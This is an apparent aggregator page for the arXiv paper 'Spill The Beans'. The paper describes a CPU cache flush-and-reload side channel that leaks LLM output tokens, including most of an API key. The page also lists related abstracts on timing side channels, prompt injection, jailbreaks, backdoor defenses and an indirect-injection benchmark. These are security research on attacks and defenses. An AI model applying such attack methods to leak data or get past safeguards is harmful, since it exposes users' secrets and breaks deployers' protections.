Spill The Beans: Exploiting CPU Cache Side-Channels to Leak Tokens from Large Language Models
- URL: http://arxiv.org/abs/2505.00817v1
- Date: Thu, 01 May 2025 19:18:56 GMT
- Title: Spill The Beans: Exploiting CPU Cache Side-Channels to Leak Tokens from Large Language Models
- Authors: Andrew Adiletta, Berk Sunar,
- Abstract summary: We introduce Spill The Beans, a novel application of cache side-channels to leak tokens generated by Large Language Models (LLMs)<n>A significant challenge is the massive size of LLMs, which, by nature of their compute intensive operation, quickly evicts embedding vectors from the cache.<n>Monitoring more tokens increases potential vocabulary leakage but raises the chance of missing cache hits due to eviction.<n>Our findings reveal a new vulnerability in LLM deployments, highlighting that even sophisticated models are susceptible to traditional side-channel attacks.
- Score: 4.5987419425784966
- License: http://creativecommons.org/licenses/by-nc-nd/4.0/
- Abstract: Side-channel attacks on shared hardware resources increasingly threaten confidentiality, especially with the rise of Large Language Models (LLMs). In this work, we introduce Spill The Beans, a novel application of cache side-channels to leak tokens generated by an LLM. By co-locating an attack process on the same hardware as the victim model, we flush and reload embedding vectors from the embedding layer, where each token corresponds to a unique embedding vector. When accessed during token generation, it results in a cache hit detectable by our attack on shared lower-level caches. A significant challenge is the massive size of LLMs, which, by nature of their compute intensive operation, quickly evicts embedding vectors from the cache. We address this by balancing the number of tokens monitored against the amount of information leaked. Monitoring more tokens increases potential vocabulary leakage but raises the chance of missing cache hits due to eviction; monitoring fewer tokens improves detection reliability but limits vocabulary coverage. Through extensive experimentation, we demonstrate the feasibility of leaking tokens from LLMs via cache side-channels. Our findings reveal a new vulnerability in LLM deployments, highlighting that even sophisticated models are susceptible to traditional side-channel attacks. We discuss the implications for privacy and security in LLM-serving infrastructures and suggest considerations for mitigating such threats. For proof of concept we consider two concrete attack scenarios: Our experiments show that an attacker can recover as much as 80%-90% of a high entropy API key with single shot monitoring. As for English text we can reach a 40% recovery rate with a single shot. We should note that the rate highly depends on the monitored token set and these rates can be improved by targeting more specialized output domains.
Related papers
- I Know What You Said: Unveiling Hardware Cache Side-Channels in Local Large Language Model Inference [19.466754645346175]
Large Language Models (LLMs) that can be deployed locally have recently gained popularity for privacy-sensitive tasks.<n>We unveil novel side-channel vulnerabilities in local LLM inference, which can expose both the victim's input and output text.<n>We design a novel eavesdropping attack framework targeting both open-source and proprietary LLM inference systems.
arXiv Detail & Related papers (2025-05-10T19:06:37Z) - Token-Efficient Prompt Injection Attack: Provoking Cessation in LLM Reasoning via Adaptive Token Compression [12.215295420714787]
"Reasoning Interruption Attack" is a prompt injection attack based on adaptive token compression.<n>We develop a systematic approach to efficiently collect attack prompts and an adaptive token compression framework.<n> Experiments show our compression framework significantly reduces prompt length while maintaining effective attack capabilities.
arXiv Detail & Related papers (2025-04-29T07:34:22Z) - Layer-Level Self-Exposure and Patch: Affirmative Token Mitigation for Jailbreak Attack Defense [55.77152277982117]
We introduce Layer-AdvPatcher, a methodology designed to defend against jailbreak attacks.<n>We use an unlearning strategy to patch specific layers within large language models through self-augmented datasets.<n>Our framework reduces the harmfulness and attack success rate of jailbreak attacks.
arXiv Detail & Related papers (2025-01-05T19:06:03Z) - The Early Bird Catches the Leak: Unveiling Timing Side Channels in LLM Serving Systems [26.528288876732617]
A set of new timing side channels can be exploited to infer confidential system prompts and those issued by other users.<n>These vulnerabilities echo security challenges observed in traditional computing systems.<n>We propose a token-by-token search algorithm to efficiently recover shared prompt prefixes in the caches.
arXiv Detail & Related papers (2024-09-30T06:55:00Z) - Efficient Inference of Vision Instruction-Following Models with Elastic Cache [76.44955111634545]
We introduce Elastic Cache, a novel strategy for efficient deployment of instruction-following large vision-language models.
We propose an importance-driven cache merging strategy to prune redundancy caches.
For instruction encoding, we utilize the frequency to evaluate the importance of caches.
Results on a range of LVLMs demonstrate that Elastic Cache not only boosts efficiency but also notably outperforms existing pruning methods in language generation.
arXiv Detail & Related papers (2024-07-25T15:29:05Z) - Human-Interpretable Adversarial Prompt Attack on Large Language Models with Situational Context [49.13497493053742]
This research explores converting a nonsensical suffix attack into a sensible prompt via a situation-driven contextual re-writing.
We combine an independent, meaningful adversarial insertion and situations derived from movies to check if this can trick an LLM.
Our approach demonstrates that a successful situation-driven attack can be executed on both open-source and proprietary LLMs.
arXiv Detail & Related papers (2024-07-19T19:47:26Z) - CleanGen: Mitigating Backdoor Attacks for Generation Tasks in Large Language Models [2.852785344249702]
We develop a novel inference time defense, named CLEANGEN, to mitigate backdoor attacks for generation tasks in large language models.<n> CLEANGEN is compatible with the state-of-the-art (SOTA) LLMs.<n>Our results show that CLEANGEN achieves lower attack success rates (ASR) compared to five SOTA baseline defenses.
arXiv Detail & Related papers (2024-06-18T04:10:38Z) - Coercing LLMs to do and reveal (almost) anything [80.8601180293558]
It has been shown that adversarial attacks on large language models (LLMs) can "jailbreak" the model into making harmful statements.
We argue that the spectrum of adversarial attacks on LLMs is much larger than merely jailbreaking.
arXiv Detail & Related papers (2024-02-21T18:59:13Z) - Benchmarking and Defending Against Indirect Prompt Injection Attacks on Large Language Models [79.0183835295533]
We introduce the first benchmark for indirect prompt injection attacks, named BIPIA, to assess the risk of such vulnerabilities.<n>Our analysis identifies two key factors contributing to their success: LLMs' inability to distinguish between informational context and actionable instructions, and their lack of awareness in avoiding the execution of instructions within external content.<n>We propose two novel defense mechanisms-boundary awareness and explicit reminder-to address these vulnerabilities in both black-box and white-box settings.
arXiv Detail & Related papers (2023-12-21T01:08:39Z) - SmoothLLM: Defending Large Language Models Against Jailbreaking Attacks [99.23352758320945]
We propose SmoothLLM, the first algorithm designed to mitigate jailbreaking attacks on large language models (LLMs)
Based on our finding that adversarially-generated prompts are brittle to character-level changes, our defense first randomly perturbs multiple copies of a given input prompt, and then aggregates the corresponding predictions to detect adversarial inputs.
arXiv Detail & Related papers (2023-10-05T17:01:53Z)
This list is automatically generated from the titles and abstracts of the papers in this site.
This site does not guarantee the quality of this site (including all information) and is not responsible for any consequences.